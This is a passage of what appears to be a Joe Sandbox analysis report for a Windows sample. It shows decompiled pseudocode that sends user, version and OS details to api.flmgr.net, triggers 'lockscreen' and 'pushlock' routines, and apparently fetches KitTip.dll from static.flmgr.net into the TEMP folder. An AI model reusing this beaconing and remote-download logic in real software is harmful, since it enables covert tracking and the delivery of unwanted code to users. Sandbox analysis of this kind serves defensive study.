                                                                                        												E00162440(_t495, _t585);
                                                                                        												__eflags = _v592 - 0x10;
                                                                                        												_t586 = _v596;
                                                                                        												_t557 =  >=  ? _v612 :  &_v612;
                                                                                        												__eflags = _t586 - 1;
                                                                                        												if(_t586 < 1) {
                                                                                        													L43:
                                                                                        													_t496 = _t495 | 0xffffffff;
                                                                                        													__eflags = _t496;
                                                                                        												} else {
                                                                                        													_t531 = _t495 | 0xffffffff;
                                                                                        													_t412 = _t586 - 1;
                                                                                        													__eflags = _t412 - _t531;
                                                                                        													_t532 =  <  ? _t412 : _t531;
                                                                                        													_t495 = ( <  ? _t412 : _t531) + _t557;
                                                                                        													__eflags = _t495;
                                                                                        													while(1) {
                                                                                        														__eflags =  *_t495 - 0x2f;
                                                                                        														if( *_t495 != 0x2f) {
                                                                                        															goto L40;
                                                                                        														}
                                                                                        														_t413 =  *_t495 & 0x000000ff;
                                                                                        														__eflags = _t413 - 0x2f;
                                                                                        														if(_t413 != 0x2f) {
                                                                                        															asm("sbb eax, eax");
                                                                                        															_t414 = _t413 | 0x00000001;
                                                                                        															__eflags = _t414;
                                                                                        														} else {
                                                                                        															_t414 = 0;
                                                                                        														}
                                                                                        														__eflags = _t414;
                                                                                        														if(_t414 == 0) {
                                                                                        															_t496 = _t495 - _t557;
                                                                                        														} else {
                                                                                        															goto L40;
                                                                                        														}
                                                                                        														goto L44;
                                                                                        														L40:
                                                                                        														__eflags = _t495 - _t557;
                                                                                        														if(_t495 == _t557) {
                                                                                        															goto L43;
                                                                                        														} else {
                                                                                        															_t495 = _t495 - 1;
                                                                                        															continue;
                                                                                        														}
                                                                                        														goto L44;
                                                                                        													}
                                                                                        												}
                                                                                        												L44:
                                                                                        												_t497 = _t496 + 1;
                                                                                        												_v620 = 0;
                                                                                        												_v616 = 0xf;
                                                                                        												_v636 = 0;
                                                                                        												__eflags = _t586 - _t497;
                                                                                        												if(_t586 < _t497) {
                                                                                        													E00164210(_t435, _t497, _t575);
                                                                                        													asm("int3");
                                                                                        													_push(_t592);
                                                                                        													_t593 = _t610;
                                                                                        													_push(0xffffffff);
                                                                                        													_push(E0018D928);
                                                                                        													_push( *[fs:0x0]);
                                                                                        													_t611 = _t610 - 0x38;
                                                                                        													_t344 =  *0x19d05c; // 0x2c80d730
                                                                                        													_t345 = _t344 ^ _t593;
                                                                                        													_v1016 = _t345;
                                                                                        													_push(_t435);
                                                                                        													_push(_t586);
                                                                                        													_push(_t575);
                                                                                        													_push(_t345);
                                                                                        													 *[fs:0x0] =  &_v1012;
                                                                                        													__eflags =  *((intOrPtr*)(_t497 + 0x8c)) - 8;
                                                                                        													_t558 = _t497 + 0x78;
                                                                                        													_t436 = _v992;
                                                                                        													if( *((intOrPtr*)(_t497 + 0x8c)) >= 8) {
                                                                                        														_t558 =  *_t558;
                                                                                        													}
                                                                                        													__eflags =  *((intOrPtr*)(_t497 + 0x2c)) - 8;
                                                                                        													_t347 = _t497 + 0x18;
                                                                                        													if( *((intOrPtr*)(_t497 + 0x2c)) >= 8) {
                                                                                        														_t347 =  *_t347;
                                                                                        													}
                                                                                        													__eflags =  *((intOrPtr*)(_t497 + 0x44)) - 8;
                                                                                        													_t587 = _t497 + 0x30;
                                                                                        													if( *((intOrPtr*)(_t497 + 0x44)) >= 8) {
                                                                                        														_t587 =  *_t587;
                                                                                        													}
                                                                                        													__eflags =  *((intOrPtr*)(_t497 + 0x14)) - 8;
                                                                                        													_t577 = _t497;
                                                                                        													if(__eflags >= 0) {
                                                                                        														_t577 =  *_t497;
                                                                                        													}
                                                                                        													E00175480(_t558, __eflags,  &_v48, L"http://api.flmgr.net/log/client/stay?User=%s&Ver=%s&ChannelCode=%s&RunTime=%d&Module=pc_tray&StartMode=%d&OsVer=%s&RunMode=%d", _t577);
                                                                                        													_t612 = _t611 + 0xc;
                                                                                        													_v12 = 0;
                                                                                        													E0016C3D0(_t612,  &_v48);
                                                                                        													E00183C60(_t436, __eflags,  &_v72, _t587, _t347, _t436,  *0x19db94, _t558,  *((intOrPtr*)(_t497 + 0xc4)));
                                                                                        													_t559 = _v52;
                                                                                        													_t613 = _t612 + 0x1c;
                                                                                        													__eflags = _t559 - 0x10;
                                                                                        													if(_t559 >= 0x10) {
                                                                                        														_t504 = _v72;
                                                                                        														_t562 = _t559 + 1;
                                                                                        														_t358 = _t504;
                                                                                        														__eflags = _t562 - 0x1000;
                                                                                        														if(_t562 >= 0x1000) {
                                                                                        															_t504 =  *((intOrPtr*)(_t504 - 4));
                                                                                        															_t562 = _t562 + 0x23;
                                                                                        															_t358 = _t358 - _t504 + 0xfffffffc;
                                                                                        															__eflags = _t358 - 0x1f;
                                                                                        															if(_t358 > 0x1f) {
                                                                                        																__imp___invalid_parameter_noinfo_noreturn();
                                                                                        															}
                                                                                        														}
                                                                                        														_push(_t562);
                                                                                        														E00175733(_t358, _t504);
                                                                                        														_t613 = _t613 + 8;
                                                                                        													}
                                                                                        													_t560 = _v28;
                                                                                        													__eflags = _t560 - 8;
                                                                                        													if(_t560 >= 8) {
                                                                                        														_t503 = _v48;
                                                                                        														_t561 = 2 + _t560 * 2;
                                                                                        														_t355 = _t503;
                                                                                        														__eflags = _t561 - 0x1000;
                                                                                        														if(_t561 >= 0x1000) {
                                                                                        															_t503 =  *((intOrPtr*)(_t503 - 4));
                                                                                        															_t561 = _t561 + 0x23;
                                                                                        															_t355 = _t355 - _t503 + 0xfffffffc;
                                                                                        															__eflags = _t355 - 0x1f;
                                                                                        															if(_t355 > 0x1f) {
                                                                                        																__imp___invalid_parameter_noinfo_noreturn();
                                                                                        															}
                                                                                        														}
                                                                                        														_push(_t561);
                                                                                        														E00175733(_t355, _t503);
                                                                                        													}
                                                                                        													 *[fs:0x0] = _v20;
                                                                                        													__eflags = _v24 ^ _t593;
                                                                                        													return E001755F4(_v24 ^ _t593);
                                                                                        												} else {
                                                                                        													_t584 = _t586 - _t497;
                                                                                        													__eflags = _t584 - 0xffffffff;
                                                                                        													_t564 =  <  ? _t584 : 0xffffffff;
                                                                                        													__eflags = _v592 - 0x10;
                                                                                        													_t362 =  >=  ? _v612 :  &_v612;
                                                                                        													_t363 = ( >=  ? _v612 :  &_v612) + _t497;
                                                                                        													E00163450(_t435,  <  ? _t584 : 0xffffffff, _t575, ( >=  ? _v612 :  &_v612) + _t497, 0xffffffff);
                                                                                        													_v8 = 8;
                                                                                        													E00162360( &_v708,  &_v540);
                                                                                        													_t615 = _t610 - 0x18;
                                                                                        													_v8 = 9;
                                                                                        													E0016C3D0(_t615,  &_v708);
                                                                                        													_push( &_v684);
                                                                                        													E00184650(_t615);
                                                                                        													_t616 = _t615 + 0x1c;
                                                                                        													asm("movq xmm0, [0x1904c8]");
                                                                                        													_t508 = 0;
                                                                                        													__eflags = 0;
                                                                                        													_t371 =  *0x1904d0; // 0x3b
                                                                                        													_v8 = 0xa;
                                                                                        													asm("movq [ebp-0x224], xmm0");
                                                                                        													_v544 = _t371;
                                                                                        													_v904 = 0;
                                                                                        													do {
                                                                                        														_t567 = (0xa0a0a0a1 * _t508 >> 0x20) + _t508 >> 5;
                                                                                        														_t512 = _v904;
                                                                                        														 *(_t592 + _t512 - 0x224) =  *(_t592 + _t512 - 0x224) ^ 0x00000001;
                                                                                        														_t508 = _t512 + 1;
                                                                                        														_v904 = _t508;
                                                                                        														__eflags = _t508 - 9;
                                                                                        													} while (_t508 < 9);
                                                                                        													_t382 = E00165FB0( &_v780,  &_v684,  &_v552);
                                                                                        													__eflags = _v616 - 0x10;
                                                                                        													_t514 =  >=  ? _v636 :  &_v636;
                                                                                        													_v8 = 0xb;
                                                                                        													_t383 = E001661B0(_t382,  >=  ? _v636 :  &_v636);
                                                                                        													asm("movups xmm0, [eax]");
                                                                                        													asm("movups [ebp-0x230], xmm0");
                                                                                        													asm("movq xmm0, [eax+0x10]");
                                                                                        													 *(_t383 + 0x10) = 0;
                                                                                        													 *((intOrPtr*)(_t383 + 0x14)) = 0xf;
                                                                                        													 *_t383 = 0;
                                                                                        													asm("movq [ebp-0x220], xmm0");
                                                                                        													E0016CB50( &_v684,  &_v564);
                                                                                        													E00162440( &_v564, _t584, _v620);
                                                                                        													_v8 = 0xa;
                                                                                        													E00162440( &_v780, _t584);
                                                                                        													Sleep(_v900 * 0x3e8);
                                                                                        													_push( &_v684);
                                                                                        													_push( &_v612);
                                                                                        													_t391 = E00174F20();
                                                                                        													_t618 = _t616 + 0x14;
                                                                                        													__eflags = _t391;
                                                                                        													if(_t391 == 0) {
                                                                                        														_push(5);
                                                                                        													} else {
                                                                                        														_push(2);
                                                                                        														_t619 = _t618 - 0x18;
                                                                                        														E00162360(_t619, L"lockscreen");
                                                                                        														E00173510(_t575);
                                                                                        														_push(1);
                                                                                        														_t620 = _t619 - 0x18;
                                                                                        														_v900 = _t620;
                                                                                        														_t621 = _t620 - 0x18;
                                                                                        														E001622D0(_t621,  &_v732);
                                                                                        														_push(_t620);
                                                                                        														E00184520();
                                                                                        														_t622 = _t621 + 4;
                                                                                        														_v8 = 0xc;
                                                                                        														_t584 = _t622;
                                                                                        														_t623 = _t622 - 0x18;
                                                                                        														E001622D0(_t623,  &_v684);
                                                                                        														_push(_t622);
                                                                                        														E001843F0();
                                                                                        														_v8 = 0xa;
                                                                                        														_t409 = E00180F20();
                                                                                        														_t618 = _t623 + 0x50;
                                                                                        														__eflags = _t409;
                                                                                        														if(_t409 == 0) {
                                                                                        															_push(4);
                                                                                        														} else {
                                                                                        															_t625 = _t618 - 0x18;
                                                                                        															E00162360(_t625, L"pushlock");
                                                                                        															E001736F0(_t435, _t567, _t575, __eflags);
                                                                                        															_t618 = _t625 + 0x18;
                                                                                        															_push(3);
                                                                                        														}
                                                                                        													}
                                                                                        													_t606 = _t618 - 0x18;
                                                                                        													E00162360(_t606, L"lockscreen");
                                                                                        													E00173510(_t575);
                                                                                        													E00162440( &_v684, _t584);
                                                                                        													_t550 = _v688;
                                                                                        													_v8 = 8;
                                                                                        													__eflags = _t550 - 8;
                                                                                        													if(_t550 >= 8) {
                                                                                        														_t525 = _v708;
                                                                                        														_t550 = 2 + _t550 * 2;
                                                                                        														_t398 = _t525;
                                                                                        														__eflags = _t550 - 0x1000;
                                                                                        														if(_t550 >= 0x1000) {
                                                                                        															_t525 =  *((intOrPtr*)(_t525 - 4));
                                                                                        															_t550 = _t550 + 0x23;
                                                                                        															_t398 = _t398 - _t525 + 0xfffffffc;
                                                                                        															__eflags = _t398 - 0x1f;
                                                                                        															if(_t398 > 0x1f) {
                                                                                        																__imp___invalid_parameter_noinfo_noreturn();
                                                                                        															}
                                                                                        														}
                                                                                        														_push(_t550);
                                                                                        														E00175733(_t398, _t525);
                                                                                        														_t606 = _t606 + 8;
                                                                                        													}
                                                                                        													E00162440( &_v636, _t584);
                                                                                        													E00162440( &_v732, _t584);
                                                                                        													E00162440( &_v612, _t584);
                                                                                        													goto L58;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					L74:
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					return E001755F4(_v20 ^ _t592);
                                                                                        				}
                                                                                        			}




























































































































































                                                                                        0x001727d0
                                                                                        0x001727d0
                                                                                        0x001727d3
                                                                                        0x001727e7
                                                                                        0x001727ee
                                                                                        0x001727f7
                                                                                        0x00172803
                                                                                        0x00172808
                                                                                        0x0017280b
                                                                                        0x0017280f
                                                                                        0x00172816
                                                                                        0x00172822
                                                                                        0x00172825
                                                                                        0x0017282a
                                                                                        0x0017282f
                                                                                        0x00172834
                                                                                        0x0017283d
                                                                                        0x00172841
                                                                                        0x00172856
                                                                                        0x00172860
                                                                                        0x00172867
                                                                                        0x00172877
                                                                                        0x00172881
                                                                                        0x00172886
                                                                                        0x0017289a
                                                                                        0x001728a0
                                                                                        0x001728a2
                                                                                        0x001728ac
                                                                                        0x001728b2
                                                                                        0x001728bc
                                                                                        0x001728c3
                                                                                        0x001728c6
                                                                                        0x001728c6
                                                                                        0x001728c9
                                                                                        0x001728cc
                                                                                        0x001728cc
                                                                                        0x001728db
                                                                                        0x001728e3
                                                                                        0x001728e8
                                                                                        0x001728f4
                                                                                        0x001728f8
                                                                                        0x001728fd
                                                                                        0x00172907
                                                                                        0x0017290a
                                                                                        0x0017290f
                                                                                        0x00172915
                                                                                        0x00172917
                                                                                        0x0017291a
                                                                                        0x00172a20
                                                                                        0x00172a3f
                                                                                        0x00172a47
                                                                                        0x00172a48
                                                                                        0x00172a48
                                                                                        0x00172920
                                                                                        0x00172920
                                                                                        0x0017292c
                                                                                        0x00172933
                                                                                        0x00172936
                                                                                        0x0017293a
                                                                                        0x0017293d
                                                                                        0x00172941
                                                                                        0x00172946
                                                                                        0x0017294b
                                                                                        0x0017294f
                                                                                        0x00172953
                                                                                        0x00172957
                                                                                        0x0017295b
                                                                                        0x0017295f
                                                                                        0x00172962
                                                                                        0x00172966
                                                                                        0x0017296a
                                                                                        0x00172973
                                                                                        0x00172977
                                                                                        0x0017297c
                                                                                        0x00172983
                                                                                        0x0017298b
                                                                                        0x00172990
                                                                                        0x00172995
                                                                                        0x0017299d
                                                                                        0x001729a1
                                                                                        0x001729a5
                                                                                        0x001729a8
                                                                                        0x001729b0
                                                                                        0x001729b3
                                                                                        0x001729b7
                                                                                        0x001729bb
                                                                                        0x001729c0
                                                                                        0x001729c5
                                                                                        0x001729c9
                                                                                        0x001729cd
                                                                                        0x001729d1
                                                                                        0x001729d4
                                                                                        0x001729d8
                                                                                        0x001729dc
                                                                                        0x001729e5
                                                                                        0x001729e9
                                                                                        0x001729ee
                                                                                        0x001729f3
                                                                                        0x001729f8
                                                                                        0x00172a00
                                                                                        0x00172a08
                                                                                        0x00172a0c
                                                                                        0x00172a0c
                                                                                        0x0017291a
                                                                                        0x00172a4d
                                                                                        0x00172a53
                                                                                        0x00172a56
                                                                                        0x00172a56
                                                                                        0x00172a59
                                                                                        0x00172a5c
                                                                                        0x00172a5c
                                                                                        0x00172a73
                                                                                        0x00172a78
                                                                                        0x00172a85
                                                                                        0x00172a8d
                                                                                        0x00172a92
                                                                                        0x00172a99
                                                                                        0x00172a9c
                                                                                        0x00172aa4
                                                                                        0x00172aab
                                                                                        0x00172ab3
                                                                                        0x00172abb
                                                                                        0x00172ac1
                                                                                        0x00172ac3
                                                                                        0x00172aca
                                                                                        0x00172ad0
                                                                                        0x00172adc
                                                                                        0x00172ae3
                                                                                        0x00172ae6
                                                                                        0x00172aea
                                                                                        0x00172aed
                                                                                        0x00172af1
                                                                                        0x00172af6
                                                                                        0x00172afb
                                                                                        0x00172b00
                                                                                        0x00172b04
                                                                                        0x00172b08
                                                                                        0x00172b0c
                                                                                        0x00172b15
                                                                                        0x00172b18
                                                                                        0x00172b21
                                                                                        0x00172b25
                                                                                        0x00172b29
                                                                                        0x00172b32
                                                                                        0x00172b36
                                                                                        0x00172b3b
                                                                                        0x00172b42
                                                                                        0x00172b4a
                                                                                        0x00172b4f
                                                                                        0x00172b54
                                                                                        0x00172b5c
                                                                                        0x00172b60
                                                                                        0x00172b64
                                                                                        0x00172b68
                                                                                        0x00172b6b
                                                                                        0x00172b73
                                                                                        0x00172b76
                                                                                        0x00172b7a
                                                                                        0x00172b7e
                                                                                        0x00172b83
                                                                                        0x00172b88
                                                                                        0x00172b8c
                                                                                        0x00172b90
                                                                                        0x00172b94
                                                                                        0x00172b97
                                                                                        0x00172b9b
                                                                                        0x00172b9f
                                                                                        0x00172ba8
                                                                                        0x00172bac
                                                                                        0x00172bb1
                                                                                        0x00172bb6
                                                                                        0x00172bbb
                                                                                        0x00172bc3
                                                                                        0x00172bc7
                                                                                        0x00172bcf
                                                                                        0x00172bd3
                                                                                        0x00172bd3
                                                                                        0x00172be0
                                                                                        0x00172bff
                                                                                        0x00172c07
                                                                                        0x00172c08
                                                                                        0x00172c08
                                                                                        0x00172be0
                                                                                        0x00172c0d
                                                                                        0x00172c13
                                                                                        0x00172c16
                                                                                        0x00172c16
                                                                                        0x00172c19
                                                                                        0x00172c1c
                                                                                        0x00172c1c
                                                                                        0x00172c33
                                                                                        0x00172c38
                                                                                        0x00172c45
                                                                                        0x00172c4d
                                                                                        0x00172c58
                                                                                        0x00172c5b
                                                                                        0x00172c5d
                                                                                        0x00172c5f
                                                                                        0x00172c6c
                                                                                        0x00172c74
                                                                                        0x00172c74
                                                                                        0x00172c76
                                                                                        0x00172c81
                                                                                        0x00172c88
                                                                                        0x00172c8d
                                                                                        0x00172c90
                                                                                        0x00172c9d
                                                                                        0x00172ca2
                                                                                        0x00172ca6
                                                                                        0x00172cab
                                                                                        0x00172cae
                                                                                        0x00172cb0
                                                                                        0x00173317
                                                                                        0x00173317
                                                                                        0x0017331d
                                                                                        0x00173320
                                                                                        0x00173322
                                                                                        0x00173328
                                                                                        0x0017332f
                                                                                        0x00173331
                                                                                        0x00173337
                                                                                        0x00173339
                                                                                        0x0017333c
                                                                                        0x00173341
                                                                                        0x00173344
                                                                                        0x00173347
                                                                                        0x00173349
                                                                                        0x00173349
                                                                                        0x00173347
                                                                                        0x0017334f
                                                                                        0x00173351
                                                                                        0x00173356
                                                                                        0x00173356
                                                                                        0x00173359
                                                                                        0x00173361
                                                                                        0x0017336b
                                                                                        0x00173375
                                                                                        0x0017337c
                                                                                        0x0017337f
                                                                                        0x00173381
                                                                                        0x00173387
                                                                                        0x0017338e
                                                                                        0x00173390
                                                                                        0x00173396
                                                                                        0x00173398
                                                                                        0x0017339b
                                                                                        0x001733a0
                                                                                        0x001733a3
                                                                                        0x001733a6
                                                                                        0x001733a8
                                                                                        0x001733a8
                                                                                        0x001733a6
                                                                                        0x001733ae
                                                                                        0x001733b0
                                                                                        0x001733b5
                                                                                        0x00000000
                                                                                        0x00172cb6
                                                                                        0x00172cb6
                                                                                        0x00172cc3
                                                                                        0x00172ccb
                                                                                        0x00172cd1
                                                                                        0x00172cd7
                                                                                        0x00172cd9
                                                                                        0x00173300
                                                                                        0x00173300
                                                                                        0x0017330d
                                                                                        0x00173315
                                                                                        0x00000000
                                                                                        0x00172cdf
                                                                                        0x00172ce5
                                                                                        0x00172ceb
                                                                                        0x00172cf1
                                                                                        0x00172cf3
                                                                                        0x001732f4
                                                                                        0x001732fa
                                                                                        0x00000000
                                                                                        0x00172cf9
                                                                                        0x00172cf9
                                                                                        0x00172cff
                                                                                        0x00172d01
                                                                                        0x00172d09
                                                                                        0x00172d0f
                                                                                        0x00172d16
                                                                                        0x00172d18
                                                                                        0x00172d20
                                                                                        0x00172d27
                                                                                        0x00172d30
                                                                                        0x00172d3e
                                                                                        0x00172d4f
                                                                                        0x00172d57
                                                                                        0x00172d58
                                                                                        0x00172d58
                                                                                        0x00172d5d
                                                                                        0x00172d69
                                                                                        0x00172d70
                                                                                        0x00172d7f
                                                                                        0x00172d85
                                                                                        0x00172d87
                                                                                        0x001732bf
                                                                                        0x001732c1
                                                                                        0x001732cb
                                                                                        0x001732d2
                                                                                        0x00000000
                                                                                        0x00172d8d
                                                                                        0x00172d8d
                                                                                        0x00172d92
                                                                                        0x00172d92
                                                                                        0x00172d94
                                                                                        0x00172d9c
                                                                                        0x00172da2
                                                                                        0x00172da8
                                                                                        0x00172daa
                                                                                        0x00172db2
                                                                                        0x00172dc0
                                                                                        0x00172dce
                                                                                        0x00172ddf
                                                                                        0x00172de7
                                                                                        0x00172de8
                                                                                        0x00172de8
                                                                                        0x00172ded
                                                                                        0x00172df9
                                                                                        0x00172e00
                                                                                        0x00172e05
                                                                                        0x00172e0c
                                                                                        0x001732d7
                                                                                        0x001732d7
                                                                                        0x001732e1
                                                                                        0x001732e6
                                                                                        0x001732f1
                                                                                        0x00000000
                                                                                        0x00172e12
                                                                                        0x00172e12
                                                                                        0x00172e1c
                                                                                        0x00172e21
                                                                                        0x00172e26
                                                                                        0x00172e29
                                                                                        0x00172e2b
                                                                                        0x00000000
                                                                                        0x00172e31
                                                                                        0x00172e3a
                                                                                        0x00172e3f
                                                                                        0x00172e47
                                                                                        0x00172e4b
                                                                                        0x00172e56
                                                                                        0x00172e5a
                                                                                        0x00172e5f
                                                                                        0x00172e67
                                                                                        0x00172e6b
                                                                                        0x00172e6c
                                                                                        0x00172e72
                                                                                        0x00172e79
                                                                                        0x00172e7e
                                                                                        0x00172e80
                                                                                        0x00173298
                                                                                        0x0017329e
                                                                                        0x001732a9
                                                                                        0x001732b4
                                                                                        0x001732b8
                                                                                        0x00000000
                                                                                        0x00172e86
                                                                                        0x00172e86
                                                                                        0x00172e8b
                                                                                        0x00172e8b
                                                                                        0x00172e8d
                                                                                        0x00172e94
                                                                                        0x00172e9a
                                                                                        0x00172ea0
                                                                                        0x00172ea2
                                                                                        0x00172ea9
                                                                                        0x00172eb0
                                                                                        0x00172ecf
                                                                                        0x00172ed7
                                                                                        0x00172ed8
                                                                                        0x00172ed8
                                                                                        0x00172edd
                                                                                        0x00172ee9
                                                                                        0x00172ef0
                                                                                        0x00172efb
                                                                                        0x00172efc
                                                                                        0x00172f07
                                                                                        0x00172f0e
                                                                                        0x00172f19
                                                                                        0x00172f1d
                                                                                        0x00172f1e
                                                                                        0x00172f29
                                                                                        0x00172f30
                                                                                        0x00172f35
                                                                                        0x00172f3b
                                                                                        0x00172f3f
                                                                                        0x00172f40
                                                                                        0x00172f4b
                                                                                        0x00172f52
                                                                                        0x00172f57
                                                                                        0x00172f5b
                                                                                        0x00172f5d
                                                                                        0x00172f5d
                                                                                        0x00172f60
                                                                                        0x00172f66
                                                                                        0x00172f69
                                                                                        0x00172f6f
                                                                                        0x00172f75
                                                                                        0x00172f7a
                                                                                        0x00172f87
                                                                                        0x00172f8d
                                                                                        0x00172f94
                                                                                        0x00172f97
                                                                                        0x00172fca
                                                                                        0x00172fca
                                                                                        0x00172fca
                                                                                        0x00172f99
                                                                                        0x00172f99
                                                                                        0x00172f9c
                                                                                        0x00172f9f
                                                                                        0x00172fa1
                                                                                        0x00172fa4
                                                                                        0x00172fa4
                                                                                        0x00172fa6
                                                                                        0x00172fa6
                                                                                        0x00172fa9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00172fab
                                                                                        0x00172fae
                                                                                        0x00172fb0
                                                                                        0x00172fb6
                                                                                        0x00172fb8
                                                                                        0x00172fb8
                                                                                        0x00172fb2
                                                                                        0x00172fb2
                                                                                        0x00172fb2
                                                                                        0x00172fbb
                                                                                        0x00172fbd
                                                                                        0x00172fc6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00172fbf
                                                                                        0x00172fbf
                                                                                        0x00172fc1
                                                                                        0x00000000
                                                                                        0x00172fc3
                                                                                        0x00172fc3
                                                                                        0x00000000
                                                                                        0x00172fc3
                                                                                        0x00000000
                                                                                        0x00172fc1
                                                                                        0x00172fa6
                                                                                        0x00172fcd
                                                                                        0x00172fcd
                                                                                        0x00172fce
                                                                                        0x00172fd8
                                                                                        0x00172fe2
                                                                                        0x00172fe9
                                                                                        0x00172feb
                                                                                        0x001733da
                                                                                        0x001733df
                                                                                        0x001733e0
                                                                                        0x001733e1
                                                                                        0x001733e3
                                                                                        0x001733e5
                                                                                        0x001733f0
                                                                                        0x001733f1
                                                                                        0x001733f4
                                                                                        0x001733f9
                                                                                        0x001733fb
                                                                                        0x001733fe
                                                                                        0x001733ff
                                                                                        0x00173400
                                                                                        0x00173401
                                                                                        0x00173405
                                                                                        0x0017340b
                                                                                        0x00173412
                                                                                        0x00173415
                                                                                        0x00173418
                                                                                        0x0017341a
                                                                                        0x0017341a
                                                                                        0x0017341c
                                                                                        0x00173420
                                                                                        0x00173423
                                                                                        0x00173425
                                                                                        0x00173425
                                                                                        0x00173427
                                                                                        0x0017342b
                                                                                        0x0017342e
                                                                                        0x00173430
                                                                                        0x00173430
                                                                                        0x00173432
                                                                                        0x00173436
                                                                                        0x00173438
                                                                                        0x0017343a
                                                                                        0x0017343a
                                                                                        0x00173456
                                                                                        0x0017345b
                                                                                        0x0017345e
                                                                                        0x0017346b
                                                                                        0x00173474
                                                                                        0x00173479
                                                                                        0x0017347c
                                                                                        0x0017347f
                                                                                        0x00173482
                                                                                        0x00173484
                                                                                        0x00173487
                                                                                        0x00173488
                                                                                        0x0017348a
                                                                                        0x00173490
                                                                                        0x00173492
                                                                                        0x00173495
                                                                                        0x0017349a
                                                                                        0x0017349d
                                                                                        0x001734a0
                                                                                        0x001734a2
                                                                                        0x001734a2
                                                                                        0x001734a0
                                                                                        0x001734a8
                                                                                        0x001734aa
                                                                                        0x001734af
                                                                                        0x001734af
                                                                                        0x001734b2
                                                                                        0x001734b5
                                                                                        0x001734b8
                                                                                        0x001734ba
                                                                                        0x001734bd
                                                                                        0x001734c4
                                                                                        0x001734c6
                                                                                        0x001734cc
                                                                                        0x001734ce
                                                                                        0x001734d1
                                                                                        0x001734d6
                                                                                        0x001734d9
                                                                                        0x001734dc
                                                                                        0x001734de
                                                                                        0x001734de
                                                                                        0x001734dc
                                                                                        0x001734e4
                                                                                        0x001734e6
                                                                                        0x001734eb
                                                                                        0x001734f1
                                                                                        0x001734ff
                                                                                        0x00173509
                                                                                        0x00172ff1
                                                                                        0x00172ff1
                                                                                        0x00172ff9
                                                                                        0x00173001
                                                                                        0x00173004
                                                                                        0x0017300c
                                                                                        0x00173013
                                                                                        0x0017301c
                                                                                        0x00173027
                                                                                        0x00173032
                                                                                        0x00173037
                                                                                        0x0017303a
                                                                                        0x00173047
                                                                                        0x00173052
                                                                                        0x00173053
                                                                                        0x00173058
                                                                                        0x0017305b
                                                                                        0x00173063
                                                                                        0x00173063
                                                                                        0x00173065
                                                                                        0x0017306a
                                                                                        0x0017306e
                                                                                        0x00173076
                                                                                        0x0017307c
                                                                                        0x00173082
                                                                                        0x0017308d
                                                                                        0x00173099
                                                                                        0x001730a7
                                                                                        0x001730ae
                                                                                        0x001730af
                                                                                        0x001730b5
                                                                                        0x001730b5
                                                                                        0x001730cf
                                                                                        0x001730d7
                                                                                        0x001730ea
                                                                                        0x001730f4
                                                                                        0x001730f8
                                                                                        0x00173103
                                                                                        0x00173106
                                                                                        0x0017310d
                                                                                        0x00173112
                                                                                        0x00173119
                                                                                        0x00173120
                                                                                        0x0017312a
                                                                                        0x00173132
                                                                                        0x0017313d
                                                                                        0x00173148
                                                                                        0x0017314c
                                                                                        0x0017315c
                                                                                        0x00173168
                                                                                        0x0017316f
                                                                                        0x00173170
                                                                                        0x00173175
                                                                                        0x00173178
                                                                                        0x0017317a
                                                                                        0x0017320e
                                                                                        0x00173180
                                                                                        0x00173180
                                                                                        0x00173182
                                                                                        0x0017318c
                                                                                        0x00173193
                                                                                        0x00173198
                                                                                        0x0017319a
                                                                                        0x001731a3
                                                                                        0x001731ab
                                                                                        0x001731b1
                                                                                        0x001731b6
                                                                                        0x001731b7
                                                                                        0x001731bc
                                                                                        0x001731bf
                                                                                        0x001731c3
                                                                                        0x001731cb
                                                                                        0x001731d1
                                                                                        0x001731d6
                                                                                        0x001731d7
                                                                                        0x001731df
                                                                                        0x001731e3
                                                                                        0x001731e8
                                                                                        0x001731eb
                                                                                        0x001731ed
                                                                                        0x0017320a
                                                                                        0x001731ef
                                                                                        0x001731ef
                                                                                        0x001731f9
                                                                                        0x001731fe
                                                                                        0x00173203
                                                                                        0x00173206
                                                                                        0x00173206
                                                                                        0x001731ed
                                                                                        0x00173210
                                                                                        0x0017321a
                                                                                        0x00173221
                                                                                        0x0017322c
                                                                                        0x00173231
                                                                                        0x00173237
                                                                                        0x0017323b
                                                                                        0x0017323e
                                                                                        0x00173240
                                                                                        0x00173246
                                                                                        0x0017324d
                                                                                        0x0017324f
                                                                                        0x00173255
                                                                                        0x00173257
                                                                                        0x0017325a
                                                                                        0x0017325f
                                                                                        0x00173262
                                                                                        0x00173265
                                                                                        0x00173267
                                                                                        0x00173267
                                                                                        0x00173265
                                                                                        0x0017326d
                                                                                        0x0017326f
                                                                                        0x00173274
                                                                                        0x00173274
                                                                                        0x0017327d
                                                                                        0x00173288
                                                                                        0x00173293
                                                                                        0x00000000
                                                                                        0x00173293
                                                                                        0x00172feb
                                                                                        0x00172e80
                                                                                        0x00172e2b
                                                                                        0x00172e0c
                                                                                        0x00172d87
                                                                                        0x00172cf3
                                                                                        0x00172cd9
                                                                                        0x00172836
                                                                                        0x001733bd
                                                                                        0x001733c0
                                                                                        0x001733d7
                                                                                        0x001733d7

                                                                                        APIs
                                                                                          • Part of subcall function 00163540: memmove.VCRUNTIME140(?,2C80D730,?,?,?,?,?,?,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731), ref: 0016356B
                                                                                        • memset.VCRUNTIME140(?,00000000,00000208,http://static.flmgr.net/kit/KitTip.dll,00000026,?,?,?,?,?,?,?,?,?,?,2C80D730), ref: 00172881
                                                                                        • GetEnvironmentVariableW.KERNEL32(TEMP,?,00000104,?,http://static.flmgr.net/kit/KitTip.dll,00000026), ref: 0017289A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
